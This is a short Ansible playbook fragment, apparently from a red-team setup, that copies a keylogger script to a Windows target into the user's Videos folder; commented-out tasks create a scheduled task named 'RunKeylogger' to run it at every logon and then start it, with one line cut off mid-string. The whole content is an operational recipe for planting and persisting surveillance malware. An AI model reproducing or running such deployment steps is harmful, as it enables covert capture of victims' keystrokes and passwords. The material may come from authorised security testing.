---
    - name: Copy Keylogger script to the target machine
      win_copy:
        src: "/home/kali/RedTeam/keylogger.py"
        dest: "C:\\Users\\{{ ansible_user }}\\Videos\\keylogger.py"

#    - name: Create a scheduled task to run the keylogger
#      win_shell: |
#        schtasks /create /tn "RunKeylogger" /tr "C:\\Python312\\python.exe C:\\Users\\{{ ansible_user }}\\Videos\\keylogger.py" /sc onlogon /ru "{{ ansible_user }}" /rp "{{ ansible_passw>

#    - name: Start the scheduled task
#      win_shell: schtasks /run /tn "RunKeylogger"
